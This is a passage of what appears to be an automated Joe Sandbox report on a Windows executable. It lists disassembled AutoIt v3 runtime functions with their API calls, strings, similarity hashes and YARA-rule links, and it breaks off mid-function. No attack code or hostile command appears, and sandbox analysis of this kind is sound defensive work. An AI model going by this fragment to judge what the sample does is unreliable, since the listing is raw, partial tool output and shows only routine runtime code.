Part of subcall function 002D2344: GetAsyncKeyState.USER32(00000001), ref: 002D2399
Part of subcall function 002D2344: GetAsyncKeyState.USER32(00000002), ref: 002D23A7

SetTimer.USER32(00000000,00000000,00000028,002D1256), ref: 002D29FC

Strings

AutoIt v3 GUI, xrefs: 002D2974

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 803a2fc0da127df43a7c9e080d40408e4e2a4fea156d84bebbe99c9c8f229509
Instruction ID: 2a5bbe39977f26f11abd33555afdb675afa23c9594d60026ee430ac2c32c7373
Opcode Fuzzy Hash: 803a2fc0da127df43a7c9e080d40408e4e2a4fea156d84bebbe99c9c8f229509
Instruction Fuzzy Hash: C8B18E7561120AEFDB15DFA8DC55BAE7BB8FB18311F10822AFA15E72A0DB749C10CB50

Function 00354069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003540F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003541B6

Strings

DESELECT, xrefs: 003542A4
ISSELECTED, xrefs: 003541C1
SELECTINVERT, xrefs: 00354286
VIEWCHANGE, xrefs: 00354375
GETSUBITEMCOUNT, xrefs: 00354141
FINDITEM, xrefs: 00354329
GETTEXT, xrefs: 0035415F
GETSELECTED, xrefs: 003542E4
SELECTCLEAR, xrefs: 00354235
SELECTALL, xrefs: 0035421D
SELECT, xrefs: 00354250
GETITEMCOUNT, xrefs: 00354128
GETSELECTEDCOUNT, xrefs: 00354199

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: d75d16cfe8b94a15de8c4e8ad902695df6cd86797da1cb597fad1dcf4ab7774e
Instruction ID: 83a0f5b1bff93d1cd7dc79f279e10708bb0a1696f32318327c8d5bb7e9fc168a
Opcode Fuzzy Hash: d75d16cfe8b94a15de8c4e8ad902695df6cd86797da1cb597fad1dcf4ab7774e
Instruction Fuzzy Hash: E1A1A0342243159FCB19EF20C851F6AB3A5FF85319F108869BC969B7A2DB30ED59CB41

Function 003452F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00345309
LoadCursorW.USER32(00000000,00007F8A), ref: 00345314
LoadCursorW.USER32(00000000,00007F00), ref: 0034531F
LoadCursorW.USER32(00000000,00007F03), ref: 0034532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00345335
LoadCursorW.USER32(00000000,00007F01), ref: 00345340
LoadCursorW.USER32(00000000,00007F81), ref: 0034534B
LoadCursorW.USER32(00000000,00007F88), ref: 00345356
LoadCursorW.USER32(00000000,00007F80), ref: 00345361
LoadCursorW.USER32(00000000,00007F86), ref: 0034536C
LoadCursorW.USER32(00000000,00007F83), ref: 00345377
LoadCursorW.USER32(00000000,00007F85), ref: 00345382
LoadCursorW.USER32(00000000,00007F82), ref: 0034538D
LoadCursorW.USER32(00000000,00007F84), ref: 00345398
LoadCursorW.USER32(00000000,00007F04), ref: 003453A3
LoadCursorW.USER32(00000000,00007F02), ref: 003453AE
GetCursorInfo.USER32(?), ref: 003453BE
GetLastError.KERNEL32(00000001,00000000), ref: 003453E9

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 28b92cf9db7077bebcadfe040a9939bdf5b5676dd6605a98b4b86dd929129cd8
Instruction ID: 2064726efdbbeec3d7bc95b6868ff8b4d4e03aee73b17a0fa3585b895abf47ba
Opcode Fuzzy Hash: 28b92cf9db7077bebcadfe040a9939bdf5b5676dd6605a98b4b86dd929129cd8
Instruction Fuzzy Hash: AE414370E043196BDB109FBA8C4996FFFF8EF51B50B10452FF509EB291DAB8A5018E61

Function 0032AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0032AAA5
__swprintf.LIBCMT ref: 0032AB46
_wcscmp.LIBCMT ref: 0032AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0032ABAE
_wcscmp.LIBCMT ref: 0032ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0032AC21
GetDlgCtrlID.USER32(?), ref: 0032AC73
GetWindowRect.USER32(?,?), ref: 0032ACA9
GetParent.USER32(?), ref: 0032ACC7
ScreenToClient.USER32(00000000), ref: 0032ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0032AD48
_wcscmp.LIBCMT ref: 0032AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0032AD82
_wcscmp.LIBCMT ref: 0032AD96

Part of subcall function 002F386C: _iswctype.LIBCMT ref: 002F3874

Strings

%s%u, xrefs: 0032AB40

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 79a52fbc2eaa461c324b261ba84f767a84ddbcd202b911ab22421257c1b0bed3
Instruction ID: dc214897249ef963415082e6851051d8fdcba57d9db3bdee5c3fa4287a33b94e
Opcode Fuzzy Hash: 79a52fbc2eaa461c324b261ba84f767a84ddbcd202b911ab22421257c1b0bed3
Instruction Fuzzy Hash: 74A1EF71204B26EFDB16DF20D894BAAF7E8FF04355F104629F999C2190DB30E955CB92

Function 0032B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0032B3DB
_wcscmp.LIBCMT ref: 0032B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0032B414
CharUpperBuffW.USER32(?,00000000), ref: 0032B431
_wcscmp.LIBCMT ref: 0032B44F
_wcsstr.LIBCMT ref: 0032B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0032B498
_wcscmp.LIBCMT ref: 0032B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0032B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0032B518
_wcscmp.LIBCMT ref: 0032B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0032B550
GetWindowRect.USER32(00000004,?), ref: 0032B5B9

Strings

@, xrefs: 0032B3BC
ThumbnailClass, xrefs: 0032B4A3, 0032B523

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 9f728b9e0f2c8ea3e02071597bc40098e78287aa71a8d19241b2e632cf81ade4
Instruction ID: 110009fadc13d0fc40a9ea431418e19f2020b069f80ea9c491468000913098b8
Opcode Fuzzy Hash: 9f728b9e0f2c8ea3e02071597bc40098e78287aa71a8d19241b2e632cf81ade4
Instruction Fuzzy Hash: 2781CF710083199FDB02DF10E885FAAFBE8EF44354F18856AFD858A0A2DB34DD45CBA1

Function 0032B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0032B23F

Strings

[ACTIVE, xrefs: 0032B22C
[LAST, xrefs: 0032B2EC
[CLASS:, xrefs: 0032B28F
REGEXP=, xrefs: 0032B254
ACTIVE, xrefs: 0032B21A
LAST, xrefs: 0032B204
[HANDLE:, xrefs: 0032B24B
CLASSNAME=, xrefs: 0032B27C
[ALL, xrefs: 0032B2E5
ALL, xrefs: 0032B2D3
HANDLE=, xrefs: 0032B238
[REGEXPTITLE:, xrefs: 0032B267

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 518400171ae505c634d2c425d04b5cd57c0e39f031fa938cdb11748155ed09a0
Instruction ID: d8632d9e3778c84bf58c8eed7363d6a9d02a9781418d2eac3402288e0937a8ec
Opcode Fuzzy Hash: 518400171ae505c634d2c425d04b5cd57c0e39f031fa938cdb11748155ed09a0
Instruction Fuzzy Hash: 4431BE30A14329E6DB16FA60DD43FFEB7A89F24750F64046AF442711D2FF616E14CA91

Function 0032C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0032C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0032C4E6
SetWindowTextW.USER32(?,?), ref: 0032C4FD
GetDlgItem.USER32(?,000003EA), ref: 0032C512
SetWindowTextW.USER32(00000000,?), ref: 0032C518
GetDlgItem.USER32(?,000003E9), ref: 0032C528
SetWindowTextW.USER32(00000000,?), ref: 0032C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0032C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0032C569
GetWindowRect.USER32(?,?), ref: 0032C572
SetWindowTextW.USER32(?,?), ref: 0032C5DD
GetDesktopWindow.USER32 ref: 0032C5E3
GetWindowRect.USER32(00000000), ref: 0032C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0032C636
GetClientRect.USER32(?,?), ref: 0032C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0032C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0032C693

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 836cb96d729e4bdc0c06b1df99cffc15715c20a997a5eeaeb96080f4cb93cfde
Instruction ID: c09cb3d6b478a27e136e063b4fe26f0ce8b8abe7745447311693a839c9bfd7fa
Opcode Fuzzy Hash: 836cb96d729e4bdc0c06b1df99cffc15715c20a997a5eeaeb96080f4cb93cfde
Instruction Fuzzy Hash: A8517E70900709AFDB22EFA9DD85B6FBBF9FF04705F104928E686A25A0C775E904CB50

Function 0035A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0035A4C8
DestroyWindow.USER32(?,?), ref: 0035A542

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0035A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0035A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035A5F1
DestroyWindow.USER32(00000000), ref: 0035A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002D0000,00000000), ref: 0035A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035A663
GetDesktopWindow.USER32 ref: 0035A67C
GetWindowRect.USER32(00000000), ref: 0035A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0035A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0035A6B3

Part of subcall function 002D25DB: GetWindowLongW.USER32(?,000000EB), ref: 002D25EC

Strings

tooltips_class32, xrefs: 0035A5B5, 0035A643
0, xrefs: 0035A4DE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 404c0782ead3aad2db3e477676c484b8f9b9674ecb43766eab75a76c46e9847c
Instruction ID: b814efe9f80a669ff946ae60239e2ec0f373a33a080518428f34d31660e15dfa
Opcode Fuzzy Hash: 404c0782ead3aad2db3e477676c484b8f9b9674ecb43766eab75a76c46e9847c
Instruction Fuzzy Hash: FD718974144705AFD722DF28DC49F667BEAEB88301F08462DF985872B0D771E90ADB12

Function 00354619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003546AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003546F6

Strings

GETTEXT, xrefs: 00354849
GETSELECTED, xrefs: 00354806
EXPAND, xrefs: 003547A8
GETITEMCOUNT, xrefs: 003547D8
SELECT, xrefs: 003548A7
GETTOTALCOUNT, xrefs: 003546DD
CHECK, xrefs: 00354716
ISCHECKED, xrefs: 00354879
UNCHECK, xrefs: 003548D2
COLLAPSE, xrefs: 0035473C
EXISTS, xrefs: 0035475F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: f2f493603042307c8f9376209daef4945b51e1013b02188682fa00c703db94c5
Instruction ID: 486f5372d20cc53806b3d9e0868e7a0bbad9fb7cb78ddb45468bd54250b3d746
Opcode Fuzzy Hash: f2f493603042307c8f9376209daef4945b51e1013b02188682fa00c703db94c5
Instruction Fuzzy Hash: 3091AF342147119FCB19EF10C451A6AB7A5AF49354F00886DFC965B7A3CB31ED9ACB81

Function 0033A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,0035FB78), ref: 0033A0FC

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0033A11E
__swprintf.LIBCMT ref: 0033A177
__swprintf.LIBCMT ref: 0033A190
_wprintf.LIBCMT ref: 0033A246
_wprintf.LIBCMT ref: 0033A264

Strings

^ ERROR, xrefs: 0033A1E8
"%s" (%d) : ==> %s:, xrefs: 0033A25F
"%s" (%d) : ==> %s:%s%s, xrefs: 0033A241
Line %d (File "%s"):, xrefs: 0033A171, 0033A18A
%6, xrefs: 0033A0C9
Error: , xrefs: 0033A20E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%6
API String ID: 311963372-2860084004
Opcode ID: f2696d9decb0102d465d643e83ecfd274b38c22452e0383b55648d2b5b6d1b75
Instruction ID: dcc0017e71df48473e043ba3fdf6a4749645e6bacefc656750bb988474de5a71
Opcode Fuzzy Hash: f2696d9decb0102d465d643e83ecfd274b38c22452e0383b55648d2b5b6d1b75
Instruction Fuzzy Hash: 23517071900619BADF16EBE0CD86EEEB779AF04300F100566F505722A1EB356F68DF51

Function 0033A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

CharLowerBuffW.USER32(?,?), ref: 0033A636
GetDriveTypeW.KERNEL32 ref: 0033A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033A730

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

Strings

open , xrefs: 0033A692
open, xrefs: 0033A65D
wait, xrefs: 0033A6ED
closed, xrefs: 0033A64A, 0033A653
close, xrefs: 0033A63C
type cdaudio alias cd wait, xrefs: 0033A6AE
set cd door , xrefs: 0033A6D1
close cd wait, xrefs: 0033A71B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: ecc83cdfebed7694105c3d2981182f74ffb1ccd3c82dfb72c9462f2a20a9eab5
Instruction ID: b59072a056c3323a1b25ee6c0b17e6fd8df46db261a4d61cc23e88a1dba48f03
Opcode Fuzzy Hash: ecc83cdfebed7694105c3d2981182f74ffb1ccd3c82dfb72c9462f2a20a9eab5
Instruction Fuzzy Hash: 905157711147059FC701EF20C88196AB7E8FF98718F14896EF886573A1EB35AE1ACF42

Function 0033A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0033A47A
__swprintf.LIBCMT ref: 0033A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0033A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0033A4FE
_memset.LIBCMT ref: 0033A51D
_wcsncpy.LIBCMT ref: 0033A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0033A58E
CloseHandle.KERNEL32(00000000), ref: 0033A599
RemoveDirectoryW.KERNEL32(?), ref: 0033A5A2
CloseHandle.KERNEL32(00000000), ref: 0033A5AC

Strings

\??\%s, xrefs: 0033A496
\, xrefs: 0033A4B2
:, xrefs: 0033A4BD

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 88a4a345b2bda7182be1d0a0d8b51b6eca95de2ec31c96b8a0f2daf09dc98a3b
Instruction ID: 6b3d042a79db61ecc3184ab91656fd0d0bb9003864d050df11141e6e99c5b700
Opcode Fuzzy Hash: 88a4a345b2bda7182be1d0a0d8b51b6eca95de2ec31c96b8a0f2daf09dc98a3b
Instruction Fuzzy Hash: 6B3180B5500209ABEB22DFA0DC89FFB77BCEF89741F1041B6FA48D6160E77096548B25

Function 0030AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 0030AB7B
___wtomb_environ.LIBCMT ref: 0030AB9D

Part of subcall function 002F8D68: __getptd_noexit.LIBCMT ref: 002F8D68

__malloc_crt.LIBCMT ref: 0030ABC5
__malloc_crt.LIBCMT ref: 0030ABE2
_free.LIBCMT ref: 0030AC19
